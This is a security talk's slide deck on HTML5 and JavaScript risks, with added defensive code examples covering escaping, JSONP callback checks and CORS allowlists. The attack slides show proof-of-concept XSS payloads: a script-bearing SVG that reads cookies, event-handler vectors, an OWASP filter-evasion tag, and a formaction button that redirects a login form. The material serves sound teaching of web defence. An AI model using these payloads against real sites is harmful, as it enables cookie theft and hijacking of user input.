2013-06-25 - HTML5 & JavaScript Security
You know the well-known attack vectors such as SQL injection or XSS. Your application is secure. Is it really? Even if you do not use HTML5 in your web application, the browsers are ready! Do you know all the new markup? Do you already have the potential of cross-origin requests, WebSockets or local storage on your radar? Get to know the new risks that have arisen through support for HTML5 and its APIs. - See more at: http://www.developer-week.de/Programm/Veranstaltung/(event)/11133

  1. Security. bit.ly/HTML5Sec: interactive version of the presentation! Created by Johannes Hoppe
  2. JohannesHoppe.de. bit.ly/HTML5Sec: interactive version of the presentation!
  3. Goal: show attack vectors. Discuss strategies. Nothing more!
  4. Features: new attack vectors
  5. A form (Username, Password, Login):
       <form id="login" action="#">
         Username: <input type="text" name="username">
         Password: <input type="password" name="password">
         <input type="submit" value="Login">
       </form>
  6. formaction: a submit button placed outside the form is bound to it with the form attribute, and formaction overrides where the form is sent ("Klick mich!" = "Click me!"):
       <form id="login" action="#">
         Username: <input type="text" name="username">
         Password: <input type="password" name="password">
         <input type="submit" value="Login">
       </form>
       <button type="submit" form="login" formaction="http://example.org">Klick mich!</button>
  7. SVG: Presto, WebKit, Gecko and even Trident 9
       <?xml version="1.0"?>
       <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40">
         <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/>
         <circle cx="15" cy="15" r="2" fill="black" stroke="black"/>
         <circle cx="25" cy="15" r="2" fill="black" stroke="black"/>
         <path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2"/>
       </svg>
  8. SVG can contain JavaScript!
       <?xml version="1.0"?>
       <svg xmlns="http://www.w3.org/2000/svg" width="200" height="50">
         <defs>
           <style><![CDATA[ text { font-size: 6pt; } ]]></style>
         </defs>
         <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/>
         <circle cx="15" cy="15" r="2" fill="black" stroke="black"/>
         <circle cx="25" cy="15" r="2" fill="black" stroke="black"/>
         <path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2" transform="rotate(180,20,28)"/>
         <text x="11" y="50" id="display">Test</text>
         <script>
           alert(document.cookie);
           document.getElementById('display').textContent = document.cookie;
         </script>
       </svg>
  9. Business as usual: HTML5 is no worse than HTML 4 either. » http://html5sec.org
  10. XSS: injected JavaScript code
  11. Oldies but Goldies:
       index.html?message=Daten gespeichert
       index.html?message=<script>alert('XSS')</script>
       <script>
         var message = $.url().param('message');
         if (message) {
           Notifier.success(message);
         }
       </script>
  12. Eval everywhere. Eval is evil. » Demo
       <!-- Self-executing onFocus event via autoFocus -->
       <input onfocus="alert('XSS onfocus')" autofocus>
       <!-- Video OnError -->
       <video><source onerror="javascript:alert('XSS onerror')"></video>
       <!-- Presto only: Form surveillance -->
       <form id=test onforminput=alert('XSS onforminput')><input></form>
       <button form=test onformchange=alert('XSS onformchange')>X</button>
  13. OWASP (Open Web Application Security Project), XSS Filter Evasion Cheat Sheet:
       <!-- Long UTF-8 Unicode encoding without semicolons -->
       <IMG SRC="&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#34&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">
       » Old IE Demo
  14. Preventing XSS
  15. 1. Dynamic data must never be used in these places (HERE marks the spot):
       <script> HERE </script>
       <!-- HERE -->
       <div HERE="test"/>
       <HERE href="test" />
       <style> HERE </style>
  16. 2. HTML-escape dynamic data:
       &  →  &amp;
       <  →  &lt;
       >  →  &gt;
       "  →  &quot;
       '  →  &apos;
       <div>HTML ESCAPE</div>
  17. Test?
       function htmlEncode(input) {
           // jquery.text == document.createTextNode
           return ($('<div/>').text(input).html());
       }
       var saveFormat = function () {
           var args = Array.prototype.slice.call(arguments);
           var txt = args.shift();
           $.each(args, function (i, item) {
               item = htmlEncode(item);
               txt = txt.replace("{" + i + "}", item);
           });
           return txt;
       };
  18. Test!
       describe("saveFormat", function () {
           var original = '{0} - {1} - {2}';
           it("should replace placeholders", function () {
               var expected = 'A - B - C';
               var formated = saveFormat(original, 'A', 'B', 'C');
               expect(formated).toEqual(expected);
           });
           it("should encode injected content", function () {
               var expected = 'A - &lt;b&gt;TEST&lt;/b&gt; - C';
               var formated = saveFormat(original, 'A', '<b>TEST</b>', 'C');
               expect(formated).toEqual(expected);
           });
       });
  19. Test output: finished in 0.004s, No try/catch, Jasmine 1.3.1 revision 1354556913. Passing, 2 specs: saveFormat should replace placeholders, should encode injected content. » Demo
  20. Wait a moment...
       describe("saveFormat", function () {
           var original = '<a title="{0}">Test</a>';
           it("should replace quotes", function () {
               var expected = '<a title="&quot;">Test</a>';
               var formated = saveFormat(original, '"');
               expect(formated).toEqual(expected);
           });
       });
  21. Test properly! finished in 0.005s, No try/catch, Jasmine 1.3.1 revision 1354556913. Failing, 1 spec (1 spec | 1 failing): saveFormat should replace quotes.
       Expected <a title=""">Test</a> to equal <a title="&quot;">Test</a>.
       Error: Expected <a title=""">Test</a> to equal <a title="&quot;">Test</a>.
           at new jasmine.ExpectationResult (http://johanneshoppe.github.io/HTML5Security...
           at null.toEqual (http://johanneshoppe.github.io/HTML5Security/examples/jasmine...
           at null.<anonymous> (http://johanneshoppe.github.io/HTML5Security/examples/jas...
           at jasmine.Block.execute (http://johanneshoppe.github.io/HTML5Security/example...
           at jasmine.Queue.next_ (http://johanneshoppe.github.io/HTML5Security/examples/...
       » Demo
  22. 3. Attribute-escape dynamic data: a-z A-Z 0-9 → immune; , . - _ → immune; everything else → &#xHH;
       <div attr="ATTRIBUTE ESCAPE"></div>
       <!-- NEVER without quotes! -->
       <div attr=ATTRIBUTE ESCAPE></div>
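The escaper from the "Test?" slide, the quote case from "Wait a moment..." and "Test properly!", and the attribute-escape rule above, as an added example; this is not code from the slides or from the author's HTML5Security project. It emulates jQuery's text-node serialisation (which escapes only &, < and >, so a quote survives into an attribute value), adds an HTML escaper that also covers both quote characters (using &#x27; for the single quote, since &apos; is not an HTML 4 entity), implements the attribute-escape rule (alphanumerics and , . - _ pass through, everything else becomes &#xHH;) and rebuilds saveFormat on the full escaper so that the "should replace quotes" spec passes. Function names are my own.

```javascript
// Added example, not code from the slides or from the author's project.

// Emulates $('<div/>').text(input).html(): browsers serialise text nodes
// escaping only &, < and > (plus the non-breaking space); both quote
// characters pass through untouched, which is why the slide-20 spec fails.
function htmlEncodeLikeTextNode(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// HTML escape for text and quoted-attribute contexts: the five characters
// that can change the parser state are replaced with entities.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};
function htmlEscape(input) {
  return String(input).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Attribute escape (slide 22 rule): alphanumerics and , . - _ are immune,
// every other code point is written as a hex character reference. This is
// still only safe inside a *quoted* attribute value.
function attributeEscape(input) {
  return String(input).replace(/[^A-Za-z0-9,._-]/gu, (c) => {
    return "&#x" + c.codePointAt(0).toString(16).toUpperCase() + ";";
  });
}

// saveFormat rebuilt on the full escaper. The replacement is passed as a
// function so that "$&"-style patterns in the data are inserted literally
// instead of being interpreted by String.prototype.replace.
function saveFormat(template, ...args) {
  return args.reduce(
    (txt, item, i) => txt.replace("{" + i + "}", () => htmlEscape(item)),
    String(template)
  );
}

// Constructed sample inputs mirroring the specs on the slides.
console.log(htmlEncodeLikeTextNode('"'));                       // the quote survives
console.log(saveFormat('<a title="{0}">Test</a>', '"'));        // <a title="&quot;">Test</a>
console.log(saveFormat("{0} - {1} - {2}", "A", "<b>TEST</b>", "C"));
console.log(attributeEscape('" x'));                            // &#x22;&#x20;x
```

Run it with node; the first line printed is the bare quote that the jQuery-style encoder lets through, the second is the output the failing Jasmine spec expected.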
  23. 4. DO NOT JavaScript-escape dynamic data: the HTML parser runs before the JavaScript parser! "You are doing it wrong."
  24. This is everyday life: UserList.cshtml / Kendo UI template
       # if(ID != 0) { #
       <a href="javascript:DialogManager.ShowPartialDialog('@Url.Action("UserManagement", "Management")', { userId : #= htmlEncode(ID) # }, { title: '#= htmlEncode(Alias) #' })">#= htmlEncode(Alias) #</a>
       # } else { #
       #= htmlEncode(Alias) #
       # } #
  25. ? Obviously something is fundamentally wrong with the way we handle data!
  26. Storage
  27. Whether cookies, session storage, local storage or WebSQL: the data is not trustworthy!
  28. Resident XSS: really nasty!
  29. Confidential information belongs in the SERVER session!
  30. Prefer session storage!
  31. WebSQL. SQL injection:
       executeSql("SELECT foo FROM bar WHERE value=" + value);
       Prepared statement:
       executeSql("SELECT foo FROM bar WHERE value=?", [value]);
  32. Communication
  33. Mashups!
       define(['jquery', 'knockout', 'knockout.mapping', 'domReady!'], function ($, ko, mapping) {
           var url = 'http://search.twitter.com/search.json?q=%23xss&callback=?';
           $.getJSON(url).done(function (data) {
               var viewModel = mapping.fromJS(data);
               ko.applyBindings(viewModel, $('#tweets').get(0));
           });
       });
  34. Loading...
  35. JSON vs. JSON with Padding. JSON:
       {"hello": "world"}
       JSONP: the response is loaded as a script and calls the named callback:
       <script src="http://search.twitter.com/search.json?q=%23dnc13&callback=foo"></script>
       var foo = function (json) {
           $('#output').text(JSON.stringify(json, undefined, 2));
       };
       foo({"hello": "world"});
       » Demo
  36. JSONP
  37. SOP, same-origin policy → necessity is the mother of invention (JSONP). CORS, Cross-Origin Resource Sharing → Access-Control-Allow-Origin: *. WebSockets → do what you want.
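Two server-side checks matching the JSONP and CORS slides above, as an added example (not code from the slides or from the author's project): a JSONP responder that accepts only a plain JavaScript identifier path as the callback name, because the callback is echoed into a script the browser executes, and a CORS helper that reflects the request's Origin only when it is on an allowlist, instead of answering every response with Access-Control-Allow-Origin: *. The /**/ prefix and the U+2028/U+2029 handling are common JSONP hardening practice; function names and the example origins are my own.

```javascript
// Added example, not code from the slides or from the author's project.

// JSONP: the callback name ends up in executable script, so only a plain
// identifier path such as "foo" or "app.cb" is accepted (assumed policy).
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function jsonpResponse(callback, data) {
  if (typeof callback !== "string" || !CALLBACK_RE.test(callback)) {
    return null; // reject: anything else would be reflected into the script
  }
  // U+2028/U+2029 are valid inside JSON strings but are line terminators in
  // JavaScript; escape them so the padded response stays syntactically valid.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return {
    contentType: "application/javascript; charset=utf-8",
    body: "/**/" + callback + "(" + json + ");",
  };
}

// CORS: reflect the Origin only if it is allowlisted. Returning no header at
// all makes the browser block the cross-origin read; "Vary: Origin" keeps a
// cache from serving one origin's answer to another.
function corsHeaders(requestOrigin, allowedOrigins) {
  if (typeof requestOrigin !== "string" || !allowedOrigins.includes(requestOrigin)) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Vary": "Origin",
  };
}

// Constructed sample calls.
const ALLOWED = ["https://app.example"]; // hypothetical allowlist
console.log(jsonpResponse("foo", { hello: "world" }));   // /**/foo({"hello":"world"});
console.log(jsonpResponse("foo();bar", {}));             // null
console.log(corsHeaders("https://app.example", ALLOWED)); // reflected origin
console.log(corsHeaders("https://other.example", ALLOWED)); // {}
```

The same validation applies to the jQuery "callback=?" mashup on the slide before: jQuery generates the callback name client-side, but it is the endpoint that decides whether an arbitrary name is echoed back.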
  38. JS-Recon, Shell of the Future
  39. Intranet == Internet
  40. Thanks! blog.johanneshoppe.de
  41. » Sicherheit von Web-Anwendungen (Security of web applications)